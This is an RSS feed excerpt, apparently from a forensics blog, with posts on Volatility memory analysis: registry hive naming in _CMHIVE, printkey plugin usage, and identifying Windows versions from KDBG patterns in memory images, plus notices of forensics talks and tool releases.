'_CMHIVE' : [ 0x49c, {
'Hive' : [ 0x0, ['_HHIVE']],
'FileHandles' : [ 0x210, ['array', 3, ['pointer', ['void']]]],
'NotifyList' : [ 0x21c, ['_LIST_ENTRY']],
'HiveList' : [ 0x224, ['_LIST_ENTRY']],
'HiveLock' : [ 0x22c, ['pointer', ['_FAST_MUTEX']]],
'ViewLock' : [ 0x230, ['pointer', ['_FAST_MUTEX']]],
'LRUViewListHead' : [ 0x234, ['_LIST_ENTRY']],
'PinViewListHead' : [ 0x23c, ['_LIST_ENTRY']],
'FileObject' : [ 0x244, ['pointer', ['_FILE_OBJECT']]],
'FileFullPath' : [ 0x248, ['_UNICODE_STRING']],
'FileUserName' : [ 0x250, ['_UNICODE_STRING']],
'MappedViews' : [ 0x258, ['unsigned short']],
'PinnedViews' : [ 0x25a, ['unsigned short']],
'UseCount' : [ 0x25c, ['unsigned long']],
'SecurityCount' : [ 0x260, ['unsigned long']],
'SecurityCacheSize' : [ 0x264, ['unsigned long']],
'SecurityHitHint' : [ 0x268, ['long']],
'SecurityCache' : [ 0x26c, ['pointer', ['_CM_KEY_SECURITY_CACHE_ENTRY']]],
'SecurityHash' : [ 0x270, ['array', 64, ['_LIST_ENTRY']]],
'UnloadEvent' : [ 0x470, ['pointer', ['_KEVENT']]],
'RootKcb' : [ 0x474, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'Frozen' : [ 0x478, ['unsigned char']],
'UnloadWorkItem' : [ 0x47c, ['pointer', ['_WORK_QUEUE_ITEM']]],
'GrowOnlyMode' : [ 0x480, ['unsigned char']],
'GrowOffset' : [ 0x484, ['unsigned long']],
'KcbConvertListHead' : [ 0x488, ['_LIST_ENTRY']],
'KnodeConvertListHead' : [ 0x490, ['_LIST_ENTRY']],
'CellRemapArray' : [ 0x498, ['pointer', ['_CM_CELL_REMAP_BLOCK']]],
} ],

When running a hivelist command from Volatility on an XP or Windows 2003 image, the name of the hive is obtained from the FileFullPath entry above. This is more of a generic name prefixed with \Device\HarddiskVolume1. There is also a FileUserName entry in _CMHIVE, which may contain the actual path to the hive on disk. Here are a few examples:

FileFullPath: \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
FileUserName: \SystemRoot\System32\Config\SECURITY
***
FileFullPath: \Device\HarddiskVolume1\WINDOWS\system32\config\software
FileUserName: \SystemRoot\System32\Config\SOFTWARE
***
FileFullPath: \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
FileUserName: C:\Documents and Settings\NetworkService\ntuser.dat

As I said, we get the same results for Windows 2003. Starting with Windows Vista, we have an extra member in _CMHIVE, named HiveRootPath, which contains another registry name starting either with \REGISTRY\MACHINE or \REGISTRY\USER. Here we can see output from a modified hivelist plugin; each hive is separated by asterisks:

FileFullPath:
FileUserName:
HiveRootPath: \REGISTRY\MACHINE\HARDWARE
***
FileFullPath: \Device\HarddiskVolume1\Windows\System32\SMI\Store\Machine\SCHEMA.DAT
FileUserName: C:\Windows\System32\SMI\Store\Machine\SCHEMA.DAT
HiveRootPath: \registry\machine\Schema
***
FileFullPath: \Device\HarddiskVolume1\Windows\System32\config\SOFTWARE
FileUserName: \SystemRoot\System32\Config\SOFTWARE
HiveRootPath: \REGISTRY\MACHINE\SOFTWARE
***
FileFullPath: \Device\HarddiskVolume1\Windows\System32\config\DEFAULT
FileUserName: \SystemRoot\System32\Config\DEFAULT
HiveRootPath: \REGISTRY\USER\.DEFAULT
***
FileFullPath: \Device\HarddiskVolume1\Windows\System32\config\SAM
FileUserName: \SystemRoot\System32\Config\SAM
HiveRootPath: \REGISTRY\MACHINE\SAM
***
FileFullPath: \Device\HarddiskVolume1\Windows\System32\config\SECURITY
FileUserName: \SystemRoot\System32\Config\SECURITY
HiveRootPath: \REGISTRY\MACHINE\SECURITY
***
FileFullPath: \Device\HarddiskVolume1\Windows\System32\config\COMPONENTS
FileUserName: \SystemRoot\System32\Config\COMPONENTS
HiveRootPath: \REGISTRY\MACHINE\COMPONENTS
***
FileFullPath: \Device\HarddiskVolume1\Boot\BCD
FileUserName: \Device\HarddiskVolume1\Boot\BCD
HiveRootPath: \REGISTRY\MACHINE\BCD00000000
***
FileFullPath: \Device\HarddiskVolume1\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
FileUserName:
HiveRootPath: \REGISTRY\USER\S-1-5-20
***
FileFullPath: \Device\HarddiskVolume1\Windows\ServiceProfiles\LocalService\NTUSER.DAT
FileUserName: C:\Windows\ServiceProfiles\LocalService\ntuser.dat
HiveRootPath: \REGISTRY\USER\S-1-5-19
***
FileFullPath: \Device\HarddiskVolume1\Users\user\NTUSER.DAT
FileUserName: C:\Users\user\ntuser.dat
HiveRootPath: \Registry\User\S-1-5-21-3861645159-1226237480-2911178601-1000
***
FileFullPath: \Device\HarddiskVolume1\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat
FileUserName: C:\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat
HiveRootPath: \Registry\User\S-1-5-21-3861645159-1226237480-2911178601-1000_Classes
***
FileFullPath:
FileUserName:
HiveRootPath: \REGISTRY\MACHINE\SYSTEM

You can see that there are a couple of registries that only have HiveRootPath populated: \REGISTRY\MACHINE\SYSTEM and \REGISTRY\MACHINE\HARDWARE. \REGISTRY\MACHINE\HARDWARE is a volatile hive that contains hardware information populated during bootup [1]; we will explore this key a bit later. We get the same output for all service packs of Vista as well as Windows 2008 (which is closely related to Vista SP1) [2]. For Windows 7 we get slightly different results. Even though FileFullPath is defined in _CMHIVE for Windows 7, it does not appear to be used at all:

FileFullPath:
FileUserName: \SystemRoot\System32\Config\SECURITY
HiveRootPath: \REGISTRY\MACHINE\SECURITY
***
FileFullPath:
FileUserName: C:\System Volume Information\Syscache.hve
HiveRootPath: \REGISTRY\A\{43bcec53-795b-11df-9d3d-000c29bf81c3}
***
FileFullPath:
FileUserName:
HiveRootPath: \REGISTRY\MACHINE\SYSTEM
***
FileFullPath:
FileUserName:
HiveRootPath: \REGISTRY\MACHINE\HARDWARE
***
FileFullPath:
FileUserName: \SystemRoot\System32\Config\DEFAULT
HiveRootPath: \REGISTRY\USER\.DEFAULT
***
FileFullPath:
FileUserName:
HiveRootPath: \REGISTRY\USER\S-1-5-20
***
FileFullPath:
FileUserName: C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
HiveRootPath: \REGISTRY\USER\S-1-5-19
***
FileFullPath:
FileUserName: \Device\HarddiskVolume1\Boot\BCD
HiveRootPath: \REGISTRY\MACHINE\BCD00000000
***
FileFullPath:
FileUserName: \SystemRoot\System32\Config\SOFTWARE
HiveRootPath: \REGISTRY\MACHINE\SOFTWARE
***
FileFullPath:
FileUserName: C:\Users\user\ntuser.dat
HiveRootPath: \Registry\User\S-1-5-21-1665533257-296859758-874228692-1000
***
FileFullPath:
FileUserName: C:\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat
HiveRootPath: \Registry\User\S-1-5-21-1665533257-296859758-874228692-1000_Classes
***
FileFullPath:
FileUserName: \SystemRoot\System32\Config\SAM
HiveRootPath: \REGISTRY\MACHINE\SAM

Therefore in the Windows 7 output of hivelist, you will see FileUserName paths when they are defined, or HiveRootPath paths if they are not:

Virtual    Physical   Name
0x963e39d0 0x1d41a9d0 \SystemRoot\System32\Config\SECURITY
0xa057a7a8 0x3518e7a8 C:\System Volume Information\Syscache.hve
0x82ba6140 0x02ba6140 [no name]
0x87a0c008 0x28027008 [no name]
0x87a1c008 0x27fb5008 \REGISTRY\MACHINE\SYSTEM
0x87a429d0 0x27f9d9d0 \REGISTRY\MACHINE\HARDWARE
0x87abc898 0x1fd97898 \SystemRoot\System32\Config\DEFAULT
0x8849e008 0x27dc0008 \REGISTRY\USER\S-1-5-20
0x88521008 0x1be07008 C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0x8bb309d0 0x25bac9d0 \Device\HarddiskVolume1\Boot\BCD
0x8bb328d8 0x25bb58d8 \SystemRoot\System32\Config\SOFTWARE
0x91a9a9d0 0x1787c9d0 C:\Users\user\ntuser.dat
0x91f2d9d0 0x13b949d0 C:\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat
0x963bf008 0x1fa36008 \SystemRoot\System32\Config\SAM

Getting Registry Paths from the SYSTEM Registry

You can also obtain a list of the registry files that were loaded by the system by checking the \SYSTEM\CurrentControlSet\Control\Hivelist key [1]:

$ python vol.py -f VistaSP2x86.dmp --profile=VistaSP2x86 printkey -K 'controlset001\control\hivelist'
Volatile Systems Volatility Framework 1.4_rc1
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: \REGISTRY\MACHINE\SYSTEM
Key name: hivelist (V)
Last updated: 2010-11-30 18:05:20
Subkeys:
Values:
REG_SZ \REGISTRY\MACHINE\HARDWARE : (V)
REG_SZ \REGISTRY\MACHINE\SECURITY : (V) \Device\HarddiskVolume1\Windows\System32\config\SECURITY
REG_SZ \REGISTRY\MACHINE\SOFTWARE : (V) \Device\HarddiskVolume1\Windows\System32\config\SOFTWARE
REG_SZ \REGISTRY\MACHINE\SYSTEM : (V) \Device\HarddiskVolume1\Windows\System32\config\SYSTEM
REG_SZ \REGISTRY\USER\.DEFAULT : (V) \Device\HarddiskVolume1\Windows\System32\config\DEFAULT
REG_SZ \REGISTRY\MACHINE\SAM : (V) \Device\HarddiskVolume1\Windows\System32\config\SAM
REG_SZ \REGISTRY\MACHINE\COMPONENTS : (V) \Device\HarddiskVolume1\Windows\System32\config\COMPONENTS
REG_SZ \REGISTRY\MACHINE\BCD00000000 : (V) \Device\HarddiskVolume1\Boot\BCD
REG_SZ \REGISTRY\USER\S-1-5-20 : (V) \Device\HarddiskVolume1\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
REG_SZ \REGISTRY\USER\S-1-5-19 : (V) \Device\HarddiskVolume1\Windows\ServiceProfiles\LocalService\NTUSER.DAT
REG_SZ \registry\machine\Schema : (V) \Device\HarddiskVolume1\Windows\System32\SMI\Store\Machine\SCHEMA.DAT
REG_SZ \Registry\User\S-1-5-21-3861645159-1226237480-2911178601-1000 : (V) \Device\HarddiskVolume1\Users\user\NTUSER.DAT
REG_SZ \Registry\User\S-1-5-21-3861645159-1226237480-2911178601-1000_Classes : (V) \Device\HarddiskVolume1\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat

References
[1] Mark Russinovich, David Solomon and Alex Ionescu. Windows Internals, 5th Edition.
[2] Moyix, Enumerating Registry Hives.</description><link>http://www.secuobs.com/revue/news/295956.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/295956.shtml</guid></item>
<item><title>Update: Volatility printkey Plugin</title><description>Secuobs.com : 2011-03-30 15:30:28 - JL's stuff - You don't have to use the printkey plugin I released to get bruteforce action. It has been incorporated into the Volatility SVN (thanks to Mike Auty) :-). So by default you don't have to issue an offset anymore:

$ python vol.py -f ds_fuzz_hidden_proc.img printkey -K 'ControlSet001\Control\ComputerName\ComputerName'
Volatile Systems Volatility Framework 1.4_rc1
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\system
Key name: ComputerName (S)
Last updated: 2008-10-21 17:48:29
Subkeys:
Values:
REG_SZ ComputerName : (S) GINEVRA

And keys from multiple hives will also appear with a separator:

$ python vol.py -f ds_fuzz_hidden_proc.img printkey -K 'Software\Microsoft\Windows NT\CurrentVersion\Winlogon'
Volatile Systems Volatility Framework 1.4_rc1
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
Key name: Winlogon (S)
Last updated: 2008-11-26 07:38:23
Subkeys:
Values:
REG_SZ ParseAutoexec : (S) 1
REG_SZ ExcludeProfileDirs : (S) Local Settings;Temporary Internet Files;History;Temp
REG_DWORD BuildNumber : (S) 2600
----------------------------
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\default
Key name: Winlogon (S)
Last updated: 2008-11-26 07:39:40
Subkeys:
Values:
REG_SZ ParseAutoexec : (S) 1
REG_SZ ExcludeProfileDirs : (S) Local Settings;Temporary Internet Files;History;Temp
REG_DWORD BuildNumber : (S) 2600
----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT
Key name: Winlogon (S)
Last updated: 2008-11-26 07:38:53
Subkeys:
Values:
REG_SZ ParseAutoexec : (S) 1
REG_SZ ExcludeProfileDirs : (S) Local Settings;Temporary Internet Files;History;Temp
REG_DWORD BuildNumber : (S) 2600
----------------------------
Registry: \Device\HarddiskVolume1\Documents and Settings\moyix\NTUSER.DAT
Key name: Winlogon (S)
Last updated: 2008-09-19 20:29:52
Subkeys:
Values:
REG_SZ ParseAutoexec : (S) 1
REG_SZ ExcludeProfileDirs : (S) Local Settings;Temporary Internet Files;History;Temp
REG_DWORD BuildNumber : (S) 2600</description><link>http://www.secuobs.com/revue/news/295116.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/295116.shtml</guid></item>
<item><title>Modified Volatility printkey Plugin</title><description>Secuobs.com : 2011-03-25 21:58:14 - JL's stuff - As a lot of you already know, Volatility has some pretty cool registry plugins. You can use hivescan to look for registry hives (CMHIVE), hivelist to locate virtual and physical addresses of registry hives, and printkey to print out keys for a specified hive, whose virtual address is found from hivelist. In Volatility 1.3, you had to specify the CMHIVE offset (obtained from hivescan) for hivelist in order to get the virtual address for a hive to use with printkey. In Volatility 1.4, hivelist inherits hivescan and obtains the CMHIVE offsets, removing one extra step and making it easier for the user. We still have to provide a virtual address (obtained by hivelist) to printkey in order to print a key from a particular registry. Suppose you don't know which registry contains the key, or you are a little clumsy about which offset you gave printkey, or maybe you want the same key from multiple hives (like all users, for example). Well, I know I've personally had some of these issues and I'm sure others have as well :-). Recently I modified printkey to include a "brute-force" option to try to obtain a particular key from all hives and thought I'd share this in case anyone else might find it useful. The idea works similar to how hivelist was written to inherit from hivescan: printkey inherits hivelist and can obtain the offsets for all hives if run in brute-force mode. It also retains the previous usage so you can specify an offset. Let's see some examples. So suppose we want to get the computer name from this image. How do we get that? So normally you have to get a list of registry hives:

$ python vol.py -f ds_fuzz_hidden_proc.img hivelist
Volatile Systems Volatility Framework 1.4_rc1
Virtual    Physical   Name
0xe1ada008 0x0b46c008 \Device\HarddiskVolume1\Documents and Settings\moyix\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1ad0880 0x0b339880 \Device\HarddiskVolume1\Documents and Settings\moyix\NTUSER.DAT
0xe1ac09e8 0x0b21b9e8 \Device\HarddiskVolume1\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1a9f008 0x0b28b008 \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT
0xe1797a60 0x0951da60 \Device\HarddiskVolume1\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1790820 0x0960f820 \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
0xe1534820 0x032a9820 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1536820 0x032ab820 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe14771f8 0x07fc91f8 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe1482008 0x07f93008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe13725b8 0x0241d5b8 [no name]
0xe1018388 0x02200388 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe1008b60 0x020c4b60 [no name]
0x80670a8c 0x00670a8c [no name]

From the SYSTEM registry we need this key: ControlSet001\Control\ComputerName\ComputerName. We find the virtual offset and specify that in the command line along with the key:

$ python vol.py -f ds_fuzz_hidden_proc.img printkey -o 0xe1018388 -K 'ControlSet001\Control\ComputerName\ComputerName'
Volatile Systems Volatility Framework 1.4_rc1
Legend: (S) = Stable (V) = Volatile
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\system
Key name: ComputerName (S)
Last updated: 2008-10-21 17:48:29
Subkeys:
Values:
REG_SZ ComputerName : (S) GINEVRA

Nice. Ok, suppose you didn't know you needed to get this information from the SYSTEM registry. You can use the brute-force option (-b):

$ python vol.py -f ds_fuzz_hidden_proc.img printkey -b -K 'ControlSet001\Control\ComputerName\ComputerName'
Volatile Systems Volatility Framework 1.4_rc1
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of S-1-5-21-725345543-1292428093-2147272213-1003_Classes
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of $$$PROTO.HIV
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of S-1-5-19_Classes
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of $$$PROTO.HIV
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of S-1-5-20_Classes
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of $$$PROTO.HIV
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of $$$PROTO.HIV
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of SECURITY
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of $$$PROTO.HIV
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of SAM
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of HARDWARE
Legend: (S) = Stable (V) = Volatile
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\system
Key name: ComputerName (S)
Last updated: 2008-10-21 17:48:29
Subkeys:
Values:
REG_SZ ComputerName : (S) GINEVRA
WARNING : volatility.win32.rawreg : Couldn't find subkey ControlSet001 of REGISTRY

Hrmmmm, notice that you get a lot of debug warnings in addition to the correct output for this key. This is because normally you would want to know if the key is not found, and as each hive is queried for the key, failed attempts appear in the output. However in this case, we know it's not going to be found in all of the registries, so we don't care about these warnings. You could comment out the piece of code in volatility/win32/rawreg.py that gives this warning, or you could use another plugin supplied by Mike Auty called disablewarnings.py. This plugin (disablewarnings.py) is located in the contrib/plugins folder when you first download Volatility from the Google SVN. In order to use it, you must first move it to your plugins directory. So from the Volatility root folder do the following:

$ mv contrib/plugins/disablewarnings.py volatility/plugins

Now we can run the printkey plugin with the brute-force option and disable debug statements with two extra switches (-d -W):

$ python vol.py -f ds_fuzz_hidden_proc.img printkey -b -d -W -K 'ControlSet001\Control\ComputerName\ComputerName'
Volatile Systems Volatility Framework 1.4_rc1
Legend: (S) = Stable (V) = Volatile
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\system
Key name: ComputerName (S)
Last updated: 2008-10-21 17:48:29
Subkeys:
Values:
REG_SZ ComputerName : (S) GINEVRA

Want to see output from multiple hives? Let's look at the Software\Microsoft\Windows NT\CurrentVersion\WinLogon key from user hives:

$ python vol.py -f ds_fuzz_hidden_proc.img printkey -K 'Software\Microsoft\Windows NT\CurrentVersion\WinLogon' -b -d -W
Volatile Systems Volatility Framework 1.4_rc1
Legend: (S) = Stable (V) = Volatile
Registry: \Device\HarddiskVolume1\Documents and Settings\moyix\NTUSER.DAT
Key name: Windows (S)
Last updated: 2008-09-19 20:29:55
Subkeys:
(S) CurrentVersion
(S) Shell
(S) ShellNoRoam
Values:
Legend: (S) = Stable (V) = Volatile
Registry: \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT
Key name: Windows (S)
Last updated: 2008-09-19 20:28:14
Subkeys:
(S) CurrentVersion
(S) ShellNoRoam
Values:
Legend: (S) = Stable (V) = Volatile
Registry: \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
Key name: Windows (S)
Last updated: 2008-09-19 20:27:48
Subkeys:
(S) CurrentVersion
(S) ShellNoRoam
Values:
Legend: (S) = Stable (V) = Volatile
Registry: \Device\HarddiskVolume1\WINDOWS\system32\config\default
Key name: Windows (S)
Last updated: 2008-09-19 16:17:14
Subkeys:
(S) CurrentVersion
(S) ShellNoRoam
Values:

Notice that the output is also slightly different, since printkey specifies which hive it got the information from (Registry: Path). You can find the modified printkey plugin here. Just replace your current printkey (located in volatility/plugins/registry) with this new one and you're set.</description><link>http://www.secuobs.com/revue/news/294256.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/294256.shtml</guid></item>
<item><title>John Jay Center for Cybercrime Studies Talk: 3/29/11 2PM</title><description>Secuobs.com : 2011-03-22 21:46:40 - JL's stuff - There's an upcoming talk at The Center for Cybercrime Studies, John Jay College of Criminal Justice next week (Tuesday March 29th, 2011, 2:00 PM) that may interest some of you in the NYC area. "Cyber Criminals: Who are they? Why are they successful? How do we respond?" Kim Peretti, Director, Forensic Services Practices, PricewaterhouseCoopers LLP; formerly Senior Counsel, US Dept. of Justice, Criminal Division, Computer Crime and Intellectual Property Section. This session will walk through recent prosecutions of sophisticated hacking rings in order to provide insight into the individuals behind these types of crimes and why they are successful. This presentation will also discuss the emerging area of cyber forensics and methods by which entities can better prevent, detect, and respond to cyber attacks on their systems. Events will take place at John Jay College of Criminal Justice, 899 Tenth Avenue, Room 630T, Haaren Hall (between 58th and 59th Streets). RSVP to Nicole Daniels (ndaniels@jjay.cuny.edu, 212-237-8920).</description><link>http://www.secuobs.com/revue/news/293433.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/293433.shtml</guid></item>
<item><title>Volatility 1.4 get_plugins Script</title><description>Secuobs.com : 2011-03-22 15:36:17 - JL's stuff - For those who can't wait for the official release of 1.4: I've updated the Volatility Full Dev Installation Wiki to include installation on Linux. In case you want to automate installation you can use the new get_plugins script. I've only tested it on Mac OSX and Ubuntu, but it should still install dependencies and Volatility 1.4 on other Linux distributions (provided that you have your supporting libraries like libpcre installed already). Feel free to look at the code before running, however :-). Caveat: There is still an issue with the Distorm3 library on Mac OSX and you'll have to compile and install that one manually.</description><link>http://www.secuobs.com/revue/news/293311.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/293311.shtml</guid></item>
<item><title>NYC4SEC Meeting 1/19/2011</title><description>Secuobs.com : 2011-01-06 00:13:58 - JL's stuff - There is an NYC4SEC meeting this month on 1/19/2011. This month our speaker is Jon Stewart, who will be giving a talk about his new tool, Lightgrep. Details are below. "Lightgrep - Fast Keyword Searching for Forensics". Dislike waiting 5 days for your keyword search to complete? Been brought to tears by thousands of keywords? Lost faith in your forensics tools when they didn't find all the hits they should have? Come to this talk to see the first public demonstration of Lightgrep, a new regular expressions search tool designed specifically for forensics. Search is a fundamental part of forensics, useful not only for discovering relevant documents and snippets of text, but also artifacts, files in unallocated space, and file signature analysis. We will discuss the basic principles behind how a grep search works, why it's important to consider how multiple keywords are handled, and how to validate a search tool's results. Finally, we'll show Lightgrep, a tool that allows for fast searching for thousands of keywords, with full EnCase integration. Please join us on Wednesday, January 19th, 7:00pm at John Jay College - Forensic Computing Program and the Center for Cybercrime Studies, 899 Tenth Avenue - btwn 58th &amp; 59th, Room 610T - 6th Floor. Jon Stewart is a software developer and co-founder of Lightbox Technologies, Inc. Prior to Lightbox, Jon was a senior developer and consultant with Guidance Software, where he worked heavily on the EnScript programming language and created EnCase eDiscovery. Jon lives in Arlington, VA and blogs regularly about EnScript, programming, and forensics at http://codeslack.blogspot.com. Don't forget to RSVP! Thanks to Douglas Brush, Prof. Bilal Khan, Prof. Douglas Salane and Prof. Richard Lovely for helping to make this possible.</description><link>http://www.secuobs.com/revue/news/276135.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/276135.shtml</guid></item>
<item><title>Identifying Memory Images</title><description>Secuobs.com : 2010-12-12 22:41:51 - JL's stuff - Have you ever been given a memory image to examine and not known what OS it was? Or maybe you were told it was X when it was really Y? Or perhaps you have a collection of images that may not be labeled correctly? So how do you figure out the OS of an unknown Windows image?

Strings

You could use strings to look for clues of the OS type, for example looking for the version numbers [1]. You can often find this in close proximity to a DLL name. Two examples (XP and Windows 7) are below.

Windows XP:
5.1.2600
2546060 5.1.2600.0 (xpclient.010817-1148)
2546134 InternalName
2546160 HCAppRes.dll
2546194 LegalCopyright
2546226 © Microsoft Corporation. All rights reserved.
2546322 OriginalFilename
2546356 HCAppRes.dll

Windows 7:
6.1.7600.16385 (win7_rtm.090713-1255)
1335896 6.1.7600.16385 (win7_rtm.090713-1255)
1335978 InternalName
1336004 BlbEvents.dll
1336038 LegalCopyright
1336070 © Microsoft Corporation. All rights reserved.

How do you determine if the memory image is from an x86 or x64 machine? Well, here you can look for environment variables like PROCESSOR_ARCHITECTURE and PROCESSOR_ARCHITEW6432 (used for WOW64) [2]. An example from x86 and x64 machines:
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 37 Stepping 5, GenuineIntel
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
More details about these variables can be found here. Still, this is more labor intensive than it need be.

Using _DBGKD_DEBUG_DATA_HEADER64

Remembering a blog post Moyix wrote about finding kernel global variables in Windows, I figured each OS would have a different size after the OwnerTag defined in wdbgexts.h:
typedef struct _DBGKD_DEBUG_DATA_HEADER64 {
    LIST_ENTRY64 List;
    ULONG OwnerTag; // KDBG
    ULONG Size;     // Different for each OS
} DBGKD_DEBUG_DATA_HEADER64, *PDBGKD_DEBUG_DATA_HEADER64;

Moyix gives us the pattern to search for regarding x86 OSes, since the end of LIST_ENTRY64 will be 0 for x86 machines [3]: \x00\x00\x00\x00\x00\x00\x00\x00KDBG. First let's try to find the sizes for each OS:

$ xxd xpsp3x86.dd | less
[skip]
0000b70: 6780 0000 0000 0000 0000 4b44 4247 9002  g.........KDBG..
[skip]
$ xxd win7x86.dd | less
[skip]
0000bf0: ffff ffec 6fbb 83ec 6fbb 8300 0000 0000  ....o...o.......
0000c00: 0000 004b 4442 4740 0300 0000 8084 8300  ...KDBG@........
[skip]

After examining XP, W2K3, Vista, W2K8 and Windows 7 machines (and different service packs), this is what we get (the Windows 2000 value was not done personally, but taken from Moyix's blog [3]):
OS: Size
Windows 2000: \x08\x02
XP: \x90\x02
W2K3: \x18\x03
Vista: \x28\x03
W2K8: \x30\x03
Windows 7: \x40\x03

Now we need to find the pattern for x64 systems as well. We could do this with a hexdump of memory images to find the KDBG pattern:

$ xxd win7x64.dd | less
[skip]
0000080: f8ff ff10 44a1 0200 f8ff ff4b 4442 4740  ....D......KDBG@
0000090: 0300 0000 f080 0200 f8ff ff60 8f87 0200  ...........`....
[skip]
$ xxd w2k8x64.dd | less
[skip]
0000f10: f8ff ff40 f878 0100 f8ff ff4b 4442 4730  ...@.x.....KDBG0
0000f20: 0300 0000 c060 0100 f8ff ff60 b865 0100  .....`.....`.e..
[skip]

After examining several x64 dumps, the pattern that seemed universal to them was '\x00\xf8\xff\xffKDBG'. The header sizes also appear to remain the same for x64 and x86 machines. So there it is. You can search for a unique pattern in the memory image in order to figure out what OS it is. Some examples:
Windows 7 x86: '\x00\x00\x00\x00\x00\x00\x00\x00KDBG\x40\x03'
W2K3 x86: '\x00\x00\x00\x00\x00\x00\x00\x00KDBG\x18\x03'
W2K8 x64: '\x00\xf8\xff\xffKDBG\x30\x03'
You could very easily write a Python script to identify Windows memory images using this technique, but you don't have to! This has already been incorporated into the Volatility 1.4 framework in the imageinfo.py plugin. Thanks to Mike Auty (ikelos) for doing the honors :-).

References
[1] List of Windows Versions, http://en.wikipedia.org/wiki/List_of_Microsoft_Windows_versions
[2] HOWTO: Detect Process Bitness, http://blogs.msdn.com/b/davidwang/archive/2006/03/26/howto-detect-process-bitness.aspx
[3] Finding Kernel Global Variables in Windows, http://moyix.blogspot.com/2008/04/finding-kernel-global-variables-in.html</description><link>http://www.secuobs.com/revue/news/271182.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/271182.shtml</guid></item>
<item><title>Volatility 1.4 get_plugins Script Update</title><description>Secuobs.com : 2010-12-06 17:58:34 - JL's stuff - I've finally gotten around to updating the get_plugins script I wrote a while back (and finally gotten around to blogging about it). This is due to a few changes in plugins and dependencies, and to address difficulties mentioned in lorgor's blog. MHL has also updated malfind2 to work with Yara 1.4a, so this script is compatible with those changes. I have only tested this on Ubuntu and Mac OSX (with MacPorts installed). 1. You must run this script as root. 2. This script also installs Volatility using SVN. If you are running Ubuntu or Mac it will check that SVN is installed, and if not, will install it and pull down Volatility in the current directory. 3. If you are running Ubuntu or Mac OSX, this script will install other dependencies you will need, like pcregrep, libpcre++-dev, python-dev for Ubuntu or pcre, pcre++ for Mac. 4. This script installs dependencies: pefile, libdasm, pycrypto, yara-python 1.4a, as well as all known Volatility plugins, including the newer VAP ones from MHL. You still have to install Inline Python on your own. You can find the script in my GitHub repository or as raw text here.</description><link>http://www.secuobs.com/revue/news/269674.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/269674.shtml</guid></item>
<item><title>Misc Updates</title><description>Secuobs.com : 2010-11-18 18:26:38 - JL's stuff - There have been some interesting items in the last week. Brian Carrier has started a new Open Source Digital Forensics website. It offers a quick way for people to find useful tools, papers and procedures. Dave Kovar released a new version of analyzeMFT. Not sure how he's had time to work on this, what with his busy globe-trotting lifestyle, but he's done it again :-). Lance Mueller blogged recently about an EnScript that uses MSSQL for faster filtering of files by hash values. It was provided by Oliver Höpli and, as Jon Stewart (Mr. EnScript) can tell you, it's quite useful. For the iPhone forensics peeps, an iPhone Forensics White Paper was released on viaForensics. There was also an open source iPhone Analyser released on Sourceforge.</description><link>http://www.secuobs.com/revue/news/265831.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/265831.shtml</guid></item>
